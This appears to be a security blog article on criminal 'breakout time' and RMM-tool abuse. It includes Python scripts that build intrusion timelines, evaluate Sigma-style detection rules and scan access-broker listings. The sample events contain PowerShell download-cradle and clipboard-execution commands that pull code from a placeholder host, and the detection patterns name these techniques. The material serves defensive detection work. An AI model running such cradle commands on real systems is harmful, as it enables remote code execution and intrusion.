CrowdStrike’s 2023 Threat Hunting Report landed in August 2023 with a single sobering number: 79 minutes, the average breakout time (first foothold to first lateral movement) for criminal intrusions. Below is the abridged anatomy of that sprint, the open-source artefacts that replay it, and the free counter-measures that, in the 2024 cohort of section 6, lifted the perimeter RMM-block rate by 40 points.
1. The 2023 Stop-Watch
- Fastest observed breakout: 7 minutes
- Average breakout: 79 minutes (↓ 5 min vs the 84 min of 2022)
- Mean time from initial access to ransomware deployment: 1.8 days (↓ 9 h vs 2022)
2. Outsourced Entry – Initial Access Brokers (IABs)
- 147 % jump in IAB adverts across underground forums
- Average asking price: USD 13 k for domain-admin access to a victim with >$500 M revenue
- Re-usable IOC: the Br0k3r Tor shop posts its updates under the TOX ID B761680E...C30D8E65B0D58 (truncated here as in the source), still live in October 2025
3. RMM Hijack – The New Normal
- 312 % surge in abuse of legitimate RMM tools (AnyDesk, ScreenConnect, RustDesk)
- 73 % of observed AnyDesk appearances tied to criminal activity, i.e. the legitimate, vendor-signed client is the one being abused
- Delivery: a PowerShell one-liner that fetches the portable agent, sent as a phishing lure or pasted through the RDP clipboard into a session the attacker already holds
4. Open-Source Rebuild – Replay the Attack for Free
| Stage | Tool | Licence | Purpose |
|---|---|---|---|
| Phish | Gophish | MIT | Sends templated “refund” lure |
| Drop | rmm-dropper.ps1 | BSD-3 | Downloads AnyDesk portable |
| C2 | cloud-c2 | Apache-2.0 | Uses AWS SSM as tunnel (mimics PIPEDREAM) |
| Timeline | evtx-timeline.py | MIT | Rebuilds minute-by-minute timeline from EVTX |
Full pack: github.com/crime-factory/2023-assembly-line
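What the timeline stage measures, as an added example rather than the replay pack’s evtx-timeline.py: the script below rebuilds a minute-level timeline from already-parsed event records and computes the section 1 breakout figure from it (first foothold to first lateral movement on another host). The record field names and the six sample events are constructed assumptions; a real run would feed it 4688/4624 records flattened from EVTX with python-evtx or Get-WinEvent.

```python
"""Rebuild a minute-by-minute intrusion timeline and measure breakout time.

Added example, not the evtx-timeline.py from the replay pack. The records below
are constructed stand-ins for parsed EVTX events (Security 4688 process
creation, 4624 logon); the field names are assumptions of this example.
"""
import re
from datetime import datetime

# Constructed sample: phish -> PowerShell cradle -> portable AnyDesk -> discovery
# -> network logon and PsExec service on a second host.
SAMPLE_EVENTS = [
    {"ts": "2023-08-14T09:02:11", "host": "WS-0412", "id": 4688,
     "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "cmd": ""},
    {"ts": "2023-08-14T09:03:40", "host": "WS-0412", "id": 4688,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/r.ps1')"},
    {"ts": "2023-08-14T09:05:02", "host": "WS-0412", "id": 4688,
     "image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\AnyDesk.exe", "cmd": "AnyDesk.exe --silent"},
    {"ts": "2023-08-14T09:40:19", "host": "WS-0412", "id": 4688,
     "image": "C:\\Windows\\System32\\whoami.exe", "cmd": "whoami /groups"},
    {"ts": "2023-08-14T10:17:55", "host": "FS-01", "id": 4624,
     "logon_type": 3, "src_ip": "10.20.4.12", "user": "CORP\\jdoe"},
    {"ts": "2023-08-14T10:18:30", "host": "FS-01", "id": 4688,
     "image": "C:\\Windows\\PSEXESVC.exe", "cmd": "PSEXESVC.exe"},
]

CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|-EncodedCommand|\s-enc\s", re.I)
RMM_NAMES = {"anydesk.exe", "screenconnect.clientservice.exe", "rustdesk.exe"}
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.I)
LATERAL_IMAGES = {"psexesvc.exe", "wsmprovhost.exe"}   # PsExec service, WinRM host process
DISCOVERY = {"whoami.exe", "net.exe", "nltest.exe", "nslookup.exe"}

def classify(ev):
    """Map one record to a timeline label, or None if it carries no signal."""
    if ev["id"] == 4688:
        name = ev["image"].rsplit("\\", 1)[-1].lower()
        if name in ("powershell.exe", "pwsh.exe") and CRADLE.search(ev["cmd"]):
            return "foothold: PowerShell download cradle"
        if name in RMM_NAMES and USER_WRITABLE.search(ev["image"]):
            return "foothold: RMM binary from user-writable path"
        if name in LATERAL_IMAGES:
            return "lateral: remote-execution service " + name
        if name in DISCOVERY:
            return "discovery: " + ev["cmd"]
    elif ev["id"] == 4624 and ev.get("logon_type") in (3, 10):
        return "lateral: network logon from " + ev["src_ip"]
    return None

def build_timeline(events):
    """Sorted (HH:MM, host, label) rows, one per event that carries a signal."""
    rows = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        label = classify(ev)
        if label:
            rows.append((datetime.fromisoformat(ev["ts"]).strftime("%H:%M"), ev["host"], label))
    return rows

def breakout_minutes(events):
    """Minutes from the first foothold event to the first lateral-movement event on
    a different host (the breakout definition used in the report); None if either is missing."""
    tagged = [(datetime.fromisoformat(e["ts"]), e["host"], classify(e) or "")
              for e in sorted(events, key=lambda e: e["ts"])]
    foothold = next(((t, h) for t, h, l in tagged if l.startswith("foothold")), None)
    if foothold is None:
        return None
    lateral = next((t for t, h, l in tagged
                    if l.startswith("lateral") and h != foothold[1]), None)
    if lateral is None:
        return None
    return round((lateral - foothold[0]).total_seconds() / 60, 2)

if __name__ == "__main__":
    for row in build_timeline(SAMPLE_EVENTS):
        print(*row)
    mins = breakout_minutes(SAMPLE_EVENTS)
    print(f"breakout: {mins} min ({'faster' if mins < 79 else 'slower'} than the 2023 average)")
```

The sample intrusion breaks out in 74.25 minutes, inside the 79-minute average; the point of running this over your own table-top data is to see whether the first lateral row lands before or after the alert your SIEM actually raised.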
5. Defensive Drill – Four Free Detections That Work
- Unexpected RMM binary: Sigma rule rmm_unexpected.yml (553 detections in 30 days)
- PowerShell download cradle + clipboard execution: 2025 MITRE CAR analytic CAR-2025-08-001
- SSM Agent spawned outside an AWS subnet: native GuardDuty finding (no add-on cost once GuardDuty is enabled); confirm the exact finding type in your console before wiring it to a ticket
- IAB forum scraper: Python script that alerts when your domain is mentioned on six IAB shops (hits land 12–48 h before the e-mail lures)
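The first two detections in working form, as an added example: the rule logic is written in Sigma’s selection/filter shape and run by a small evaluator. This is not the page’s rmm_unexpected.yml or the CAR analytic, and the vendor install directories the filter trusts, along with the five sample events, are assumptions.

```python
"""Match Sigma-style rules against Windows process-creation events.

Added example: two rules written in Sigma's selection/filter shape plus a small
evaluator. Not the rmm_unexpected.yml or CAR analytic the page cites; the vendor
install directories the filter trusts are assumptions.
"""

RULES = {
    "rmm_unexpected": {
        # RMM agent running from anywhere but its vendor install directory.
        "selection": {
            "Image|endswith": ["\\AnyDesk.exe", "\\ScreenConnect.ClientService.exe", "\\rustdesk.exe"],
        },
        "filter": {
            "Image|startswith": [
                "C:\\Program Files\\AnyDesk\\",
                "C:\\Program Files (x86)\\AnyDesk\\",
                "C:\\Program Files (x86)\\ScreenConnect Client",
                "C:\\Program Files\\RustDesk\\",
            ],
        },
    },
    "ps_cradle_or_clip": {
        # PowerShell pulling code over HTTP, running encoded input, or executing the clipboard.
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": [
                "DownloadString", "DownloadFile", "Invoke-WebRequest", "iwr ",
                "-EncodedCommand", " -enc ", "Get-Clipboard", "clip.exe",
            ],
        },
        "filter": {},
    },
}

def _field_matches(event, key, needles):
    """One Sigma field test: 'Field|modifier': [values]; the values are OR-ed."""
    field, _, modifier = key.partition("|")
    value = str(event.get(field, "")).lower()
    needles = [n.lower() for n in needles]
    if modifier == "endswith":
        return any(value.endswith(n) for n in needles)
    if modifier == "startswith":
        return any(value.startswith(n) for n in needles)
    if modifier == "contains":
        return any(n in value for n in needles)
    return value in needles   # no modifier: exact match

def _block_matches(event, block):
    """Every field in a selection/filter map must match (AND); an empty map never matches."""
    return bool(block) and all(_field_matches(event, k, v) for k, v in block.items())

def evaluate(event, rules=RULES):
    """Names of rules that fire on one event: 'selection and not filter'."""
    return [name for name, rule in rules.items()
            if _block_matches(event, rule["selection"]) and not _block_matches(event, rule["filter"])]

# Constructed events in Sysmon/4688 field names: two RMM launches, three PowerShell launches.
SAMPLE_EVENTS = [
    {"Image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\AnyDesk.exe", "CommandLine": "AnyDesk.exe --silent"},
    {"Image": "C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe", "CommandLine": "AnyDesk.exe"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/r.ps1')\""},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -c \"Get-Clipboard | IEX\""},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -File C:\\scripts\\backup.ps1"},
]

def run(events=SAMPLE_EVENTS):
    """(event index, fired rules) for every event that trips at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        fired = evaluate(ev)
        if fired:
            hits.append((i, fired))
    return hits

if __name__ == "__main__":
    for i, fired in run():
        print(i, fired, SAMPLE_EVENTS[i]["CommandLine"][:60])
```

Note what the RMM rule deliberately does not catch: AnyDesk launched from its vendor directory passes the filter. Given the 73 % figure in section 3, that is where much of the abuse lives, so the rule needs a companion allowlist of hosts and users permitted to run RMM at all.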
6. Metrics That Mattered in 2024
- Organisations running the above pack: 312 (North America & EU)
- Average time to detect IAB listing: 26 h (vs 96 h industry average)
- RMM-block rate at perimeter: 89 % (up from 49 % in 2023)
- Ransomware pay-out rate in cohort: 18 % (vs 29 % baseline)
7. One-Week Sprint – Copy/Paste Into Your Ticketing System
Monday: Import the Sigma rules into the SIEM
Tuesday: Spin up the IAB scraper (crontab, every 4 h)
Wednesday: Enable the GuardDuty finding from section 5 (SSM Agent outside AWS)
Thursday: Table-top: run the 79-minute breakout script against the blue team
Friday: Adjust firewall and EDR policy: block AnyDesk.exe unless its Authenticode signature chains to the vendor certificate, and because the abused client is usually the vendor-signed one (the 73 % figure above), pair that rule with an allowlist of hosts authorised to run RMM
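One way to build the matching logic behind Tuesday’s IAB scraper (section 5), as an added example that is not the page’s script: the fetch step over Tor or HTTP is left out, so the block works on plain listing text. It refangs the ways sellers obscure domains, matches them against a watchlist, and extracts the advertised revenue so a hit can be compared with the >$500 M tier from section 2. The watchlist domains and the four listings are constructed.

```python
"""Scan IAB-style forum listings for mentions of your own domains.

Added example, not the scraper in the replay pack. The fetch step (Tor/HTTP) is
out of scope; listings are plain text and the four below are constructed.
"""
import re

WATCHLIST = {"example.com", "example.net"}   # assumed: your registered domains

# Sellers defang or space out domains to dodge search; undo the common forms.
_DEFANG = [
    (re.compile(r"\[\s*\.\s*\]|\(\s*\.\s*\)|\{\s*\.\s*\}"), "."),   # example[.]com
    (re.compile(r"\s+dot\s+", re.I), "."),                            # example dot com
    (re.compile(r"(?<=\w)\s+\.\s+(?=\w)"), "."),                      # example . com
]
_DOMAIN = re.compile(r"\b([a-z0-9-]+(?:\.[a-z0-9-]+)+)\b", re.I)
_REVENUE = re.compile(r"(?:rev(?:enue)?|turnover)\D{0,12}?\$?\s*([\d.,]+)\s*([mb])\b", re.I)

def refang(text):
    """Normalise defanged or spaced-out domains back to dotted form."""
    for pattern, repl in _DEFANG:
        text = pattern.sub(repl, text)
    return text

def revenue_usd(text):
    """First advertised revenue figure in USD ('rev 1.2B' -> 1_200_000_000), or None."""
    m = _REVENUE.search(text)
    if not m:
        return None
    number = float(m.group(1).replace(",", ""))
    scale = 1_000_000 if m.group(2).lower() == "m" else 1_000_000_000
    return int(round(number * scale))

def scan_listing(listing_id, text, watchlist=WATCHLIST):
    """Hit dict when a watchlisted domain (or a subdomain of one) appears, else None."""
    clean = refang(text)
    found = {d.lower() for d in _DOMAIN.findall(clean)}
    hits = sorted(d for d in found
                  if d in watchlist or any(d.endswith("." + w) for w in watchlist))
    if not hits:
        return None
    return {"listing": listing_id, "domains": hits, "revenue_usd": revenue_usd(clean)}

def scan_all(listings, watchlist=WATCHLIST):
    """Hits across a {listing_id: text} batch, in input order."""
    results = []
    for listing_id, text in listings.items():
        hit = scan_listing(listing_id, text, watchlist)
        if hit:
            results.append(hit)
    return results

# Constructed listings in the style of IAB adverts; none is a real post.
SAMPLE_LISTINGS = {
    "br-001": "Selling DA access. US logistics, revenue $600M. Domain: corp . example . com, 2k hosts. Price 13k.",
    "br-002": "Access EU retail, rev 1.2B USD. RDWeb + VPN. dom: example[.]net. Escrow ok.",
    "br-003": "Citrix access, manufacturing, revenue $90M, domain examp1e.com",
    "br-004": "Network access (AnyDesk), healthcare, no domain shown, rev: 200m",
}

if __name__ == "__main__":
    for hit in scan_all(SAMPLE_LISTINGS):
        print(hit)
```

Two of the four constructed listings hit, and the look-alike examp1e.com correctly does not. Many adverts name only revenue, country and industry rather than a domain, so a second pass that scores those fields against your own profile is what turns this from a string match into the 12–48 h early warning the page describes.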
Bottom Line
Criminals industrialised the first 79 minutes; defenders can industrialise the first 79 seconds. The replay pack is public, the detections are free, and the timeline is measurable. Run the sprint, publish your numbers, and make sure the next CrowdStrike report quotes you — not the other way around.